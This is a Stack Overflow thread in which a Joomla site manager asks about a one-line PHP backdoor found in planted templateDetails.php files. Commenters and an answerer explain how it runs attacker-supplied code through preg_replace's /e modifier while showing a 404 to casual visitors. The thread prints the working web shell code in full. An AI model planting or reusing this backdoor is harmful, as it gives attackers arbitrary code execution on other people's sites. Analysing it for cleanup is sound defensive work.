-1

I just found on the Joomla installation of site I am managing a lot of templateDetails.php files hidden inside various folders with the following code:

<?php if (!isset($_REQUEST['e44e'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>

I promptly recover a site backup, changed all administrator passwords and reinforced security on the website.

Can you explain me how this kind of code be used to stole or damage the website?

Jonathan Leffler
  • 730,956
  • 141
  • 904
  • 1,278
Drake
  • 8,225
  • 15
  • 71
  • 104
  • maybe relevant - http://stackoverflow.com/questions/2142497/whats-wrong-with-using-request – Millard Nov 19 '15 at 12:33
  • It uses the [`e` flag](http://php.net/manual/en/reference.pcre.pattern.modifiers.php) to PCRE functions which evaluates PHP code in the regular expression thus allowing arbitrary code execution. – Linus Kleen Nov 19 '15 at 12:34

1 Answers1

3

I've commented the code below for you to explain:

<?php 
 //Check for a POST or GET (query string) variable called e44e
if (!isset($_REQUEST['e44e'])) 
header("HTTP/1.0 404 Not Found"); //If that variable doesn't exist, send a 404

// This is quite clever - the 'e' flag in preg forces PHP to eval the string, and then in theory use the result as the preg_replace (however in this case, that bit doesn't matter, as actually all we are looking to do is evecute whatever has been passed through request - basically doing eval(), but hiding it so it's not as obvious, and won't get picked up (in theory) by any installs that block eval (although in practise most then also stop the e flag from working as well)
@preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); 
?>

In sort, it's a fancy way to use eval(), allowing them to pass through any code as a query string, and then execute it!

Liam Wiltshire
  • 1,254
  • 13
  • 26